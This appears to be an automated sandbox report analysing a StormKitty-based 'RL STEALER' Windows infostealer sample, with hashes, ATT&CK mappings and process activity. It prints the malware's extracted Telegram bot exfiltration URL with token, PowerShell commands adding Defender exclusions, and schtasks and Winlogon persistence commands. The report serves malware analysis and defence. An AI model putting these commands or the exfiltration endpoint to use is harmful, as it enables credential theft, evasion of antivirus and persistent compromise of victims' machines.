Analysis
-
max time kernel
46s -
max time network
48s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2024 09:34
Static task
static1
Behavioral task
behavioral1
Sample
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
Resource
win10v2004-20240802-en
Errors
General
-
Target
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe
-
Size
227KB
-
MD5
1a83a244d9e90a4865aac14bc0e27052
-
SHA1
d2b65e7aed7657c9915f90f03d46902087479753
-
SHA256
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712
-
SHA512
f4b9d26d8a0841f9425abf038f85563ddee65e2404bc508fd23c8023bb565fd7f0ceaeaadde49c4951d3bbbb93f6b64b3cf610464855a2bf2d418477dd4fe03f
-
SSDEEP
6144:YzJS6VlWn4bk0+GIKSppY6sdeZywNeGC4xIAY9F:YzdVlHbk0X5SpppMVwfI
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7375773294:AAFZUnpXCxGuVizu2hOj5WMYl9ULnbeqZ6c/sendDocument?chat_id=5947406001&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2008/19/2024%209:34%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20Admin%0A%F0%9F%86%94%20PC%20=%3E%20KZYBFHMK%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20Kingdom]%0A%F0%9F%94%8D%20IP%20=%3E%20194.110.13.70%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%94%93%20Antivirus%20=%3E%20Not%20installed%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2016%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%200%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%2
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\Client.exe" Client.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\zzzz.exe family_stormkitty behavioral2/memory/4580-64-0x0000000000710000-0x0000000000766000-memory.dmp family_stormkitty -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3216 powershell.exe 1536 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exeClient.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation Client.exe -
Executes dropped EXE 3 IoCs
Processes:
Client.exeLauncher.exezzzz.exepid process 1400 Client.exe 1472 Launcher.exe 4580 zzzz.exe -
Loads dropped DLL 7 IoCs
Processes:
WmiApSrv.exeshutdown.exeLogonUI.exepid process 2844 3532 WmiApSrv.exe 5084 3192 1760 2140 shutdown.exe 2256 LogonUI.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
zzzz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 zzzz.exe Key opened \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 zzzz.exe Key opened \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 zzzz.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
Client.exe150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\WatchDog.exe" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Client.exe" 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zzzz = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zzzz.exe" 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
Processes:
zzzz.exedescription ioc process File created C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Desktop\desktop.ini zzzz.exe File created C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Downloads\desktop.ini zzzz.exe File created C:\Users\Admin\AppData\Local\KZYBFHMK\FileGrabber\Pictures\desktop.ini zzzz.exe -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 27 freegeoip.app 29 freegeoip.app 49 api.ipify.org 51 api.ipify.org 52 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
Client.exedescription ioc process File created C:\Windows\xdwd.dll Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
zzzz.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zzzz.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
zzzz.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 zzzz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier zzzz.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "103" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe -
Modifies registry class 20 IoCs
Processes:
Launcher.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 Launcher.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff Launcher.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Launcher.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Launcher.exe Set value (data) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Launcher.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Launcher.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exezzzz.exeClient.exepid process 1536 powershell.exe 1536 powershell.exe 3216 powershell.exe 3216 powershell.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 4580 zzzz.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe 1400 Client.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exeClient.exepowershell.exezzzz.exeshutdown.exedescription pid process Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 1400 Client.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeDebugPrivilege 4580 zzzz.exe Token: SeShutdownPrivilege 2140 shutdown.exe Token: SeRemoteShutdownPrivilege 2140 shutdown.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Launcher.exeLogonUI.exepid process 1472 Launcher.exe 2256 LogonUI.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exeClient.exeCMD.execmd.exedescription pid process target process PID 3456 wrote to memory of 1536 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe powershell.exe PID 3456 wrote to memory of 1536 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe powershell.exe PID 3456 wrote to memory of 1400 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Client.exe PID 3456 wrote to memory of 1400 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Client.exe PID 3456 wrote to memory of 1472 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Launcher.exe PID 3456 wrote to memory of 1472 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe Launcher.exe PID 3456 wrote to memory of 3216 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe powershell.exe PID 3456 wrote to memory of 3216 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe powershell.exe PID 3456 wrote to memory of 4580 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe zzzz.exe PID 3456 wrote to memory of 4580 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe zzzz.exe PID 3456 wrote to memory of 4580 3456 150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe zzzz.exe PID 1400 wrote to memory of 4956 1400 Client.exe CMD.exe PID 1400 wrote to memory of 4956 1400 Client.exe CMD.exe PID 4956 wrote to memory of 4864 4956 CMD.exe schtasks.exe PID 4956 wrote to memory of 4864 4956 CMD.exe schtasks.exe PID 1400 wrote to memory of 3024 1400 Client.exe cmd.exe PID 1400 wrote to memory of 3024 1400 Client.exe cmd.exe PID 3024 wrote to memory of 2140 3024 cmd.exe shutdown.exe PID 3024 wrote to memory of 2140 3024 cmd.exe shutdown.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
zzzz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 zzzz.exe -
outlook_win_path 1 IoCs
Processes:
zzzz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 zzzz.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe"C:\Users\Admin\AppData\Local\Temp\150704149f7e54c4f7cbdb776f33173979791bc0c625f42477815923d13f8712.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Shutdown /s /f /t 003⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\shutdown.exeShutdown /s /f /t 004⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zzzz.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Users\Admin\AppData\Local\Temp\zzzz.exe"C:\Users\Admin\AppData\Local\Temp\zzzz.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4580
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:3532
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa396f055 /state1:0x41c64e6d1⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2256
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
152KB
MD5bbec44e20e74da056d4a2cc3997d3601
SHA15eb6ceac55e24bbed4f804cef4d88ab60a8c8a29
SHA25657ad403324144117e963337307585d3325384276bd52bc23cb243155286ca6fb
SHA5123ba67dba01485e9ca2a82b902a4814d19184c17e1b00fea10572abc91f02ed693f97c8b12754f990c81516f57f549e5263cf792c44e8340bbd4d7ce5a949d5fe
-
Filesize
339KB
MD504a4c97f428c38b4efb5703e9f4022f6
SHA1301e448da9b3b06867794812f119f894ba6d2d9e
SHA25690d47c2f2176f846e33aa46c99891acd6c808b0d8ae0f2f454fcc3ceb905c9d2
SHA512c0e0780dc0a45eb167b4548e6449077be7ad57c3745529d5ffa1cc8715c9431035bf8ce59c389eb2df4302a554e0ccde5b807dd23241c8c3c7e645ee346cf1ae
-
Filesize
309KB
MD5f61b3fd1e1d2359049371cd78692eb27
SHA1502a3940dd4ca04e928bc1b986493ce193a6382c
SHA2563470e59333167f29421b735c230f807750f50ef25b4be443925a8d4007def4f3
SHA51295bfef25226b2dea072414c63fcd2f45b3d0e76f4e51decd997e7e02570dbdd42232e4ba9e08e11f7f7f97418aa848349eecf6fa64ec96f33163ffd6d6590a0e
-
Filesize
1.2MB
MD59aef6c21155a18bd0aee44eba3a44bf3
SHA15ba1015cdc41c45b562130b10dcc53b41b18b5b6
SHA25625ead38ba79031bc7599a620d883d10b154d417c43aad1bedc5a703359892e70
SHA512b55f53ca131896ac2f3e1f233d2200485c291bbdfa9a567ba53100bdb294faed62795eb2cb4a4fb46404bfd6b36975276ab09071a85de08c55a640ceb39b116e
-
Filesize
808KB
MD5773014ad69ca5aeb45f39252b0be2816
SHA1b08e3abdfad89b22e723cdb5ab35fd9c499fa650
SHA2563d1fd0f4bdbe9171d6e273e3d4d572e2f66b9d7a29976353f185ec80f0aaf9a8
SHA51226bc8d5cba34e576d565db0364bb5d4e632e9ee1748382c3b14114e74b9500d2739eafc19ea5e5343321fe0263c20c44b6eed380f3ba2bfb95670765bc461010
-
Filesize
960KB
MD52977a78f7892a72576f781991c3d1ad9
SHA17befc2f31fad2e6f48a55e836307db334c3f71b5
SHA2566e783bdd200232ce56a7046397ce12a9e5ae31ccd7319a520cc4f3a017dd82bf
SHA5125a8c81d9233afee80ca4e79c0143352cdaa821dcddb352125807eac60643132315b6da37836d3a2378d0aec34a37dde83bcf040d21e244b65ef2e84cc2a9ebd6
-
Filesize
1.3MB
MD5a086b5118449c28ff7796ab51f95fd84
SHA1e3ed9706534c0f006420e16e17caa5cdc2eb203e
SHA2565bc1dd84218b62cd293214b44f643d35cad67d6ef94eef38eeff9627334b0b42
SHA5121fdcf755e33e33fb9586f61d2cc2144423e1297d2f6180efabe271531234484ff16c4bcd7d7978bbde3656ddece28ce1c65b1c1de7c5fe5e6d0ace0b0ff9a819
-
Filesize
625KB
MD55c8b15f34fb8522925a4bbf98efdba37
SHA122cc4db2e6a755263b56b47e52cf030a5a152867
SHA2568e29b1892be84d8a5f69c32e1242a7407b0377943c3cca2aff08145616cabe17
SHA512d7d4ab433da36b6ee1a8d63db7b40d0a7abfa17919c3195778039e977d95c0d89432104a5f6ce6f361ae7e92343344c39d4677755aefdd4d8f2d0ab0cd247577
-
Filesize
514KB
MD5cce7fce6a9fcf6d4bcdca8c9ae84ea69
SHA155ec46d1aed64920cfc215b9190a155c92249e6a
SHA256df18509c09fcc0aa4a42b2baa6d67399b9b970dbd53a0887ea54f94134eb4ebc
SHA5127bd8cd35f71048be7c7ad851907535aa84484093ffee4a754f96a6e6cee8a23ab07dacff05aef4b61d95bbb05a4eb746599d56fad27dce2b5a3db63d62251b7b
-
Filesize
656KB
MD520e8817f321b94822fa8b9b3c09b9753
SHA1c1e74e6af703800a57a766b5c104cc7eaf8f3a16
SHA256942f37cc99b3f86f79a2539a29673d6ba0f82739c292e7b8561e11a59e3f0141
SHA5123bd7c53eab964e4ebe79afa143bcca801e8794fe4712845d570f6b9f46af7ff1a9d3950c1594b9db6c019fe526eb2b74a44a0aecff39649bd34332ddab754899
-
Filesize
4KB
MD5f29b12d00c3f0112a954af4e7e5b4f39
SHA1f9db551cf3e3cd0f13eae612e46a94f34e0ef640
SHA256e88a3a6fdf88f4b48237b02e4faa92b6359f7f320e95eedaff9383c4e4d9ec5a
SHA5129b3ad6404c0653dd52cba5c5606d6fceb635872c6745620720f81a1c31f3d57dd6612a48fdef404095639eadb0f9de6bd592212f9101648253cc870559452fdd
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
100KB
MD521560cb75b809cf46626556cd5fbe3ab
SHA1f2eec01d42a301c3caacd41cddb0ef2284dbb5a6
SHA256d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa
SHA51221eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db
-
Filesize
22KB
MD54c8f3a1e15f370ca8afe2992902a6e98
SHA1dc6324d924ac31bea4ad7e4dd6720ecdad3877dd
SHA256dcdc72549f7ad41cc860738adbeee5e44f02222415fd84ed5c92538ac9049b92
SHA512b63c4e48f3024edcf1e1391b5df6ff65fc5111849eb093b429fa0f21c03339dbaeff835f18e250758498f3432874b85348530e47b2ada93f6f68615a5ccf66c0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
